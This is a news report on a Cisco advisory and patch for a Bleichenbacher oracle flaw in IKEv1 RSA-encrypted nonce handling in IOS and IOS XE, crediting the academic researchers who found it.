Cisco has issued a patch for Cisco IOS and IOS XE software to protect users against an attack able to break encryption protocols.
On Monday, the tech giant said in a security advisory that a vulnerability exists in IOS software, originally known as the Internetwork Operating System, and IOS XE builds which are configured with the authentication rsa-encr option.
However, Cisco IOS XR is not affected.
The vulnerability allows remote attackers without authentication to obtain the encrypted nonces of an Internet Key Exchange Version 1 (IKEv1) session.
RSA-encrypted nonces are susceptible to attack due to a vulnerability caused by software which responds poorly to decryption failures. Errors in handling can be exploited by attackers who are able to send crafted ciphertexts to devices configured with IKEv1 which use RSA-encrypted nonces.
If successful, attackers are able to obtain the encrypted nonces.
Reporting the Flaw
The security flaw was reported by Dennis Felsch, Martin Grothe, and Jörg Schwenk from Ruhr-Universität Bochum, and both Adam Czubak and Marcin Szymanek from the University of Opole.
The Internet Key Exchange protocol (IKE) is used to build Virtual Private Networks (VPNs) and to establish cryptographic keys. The protocol is available in two versions which use different modes, phrases, authentication methods, and configuration options.
According to the researchers, by exploiting the Bleichenbacher oracle in an IKEv1 mode, a key pair can be reused against different variations of IKE, leading to cryptographic bypass.
“Using this exploit, we break these RSA encryption based modes, and in addition break RSA signature-based authentication in both IKEv1 and IKEv2,” the researchers said.
The team also plans to outline an offline dictionary attack against Pre-Shared Key (PSK) IKE modes at the summit.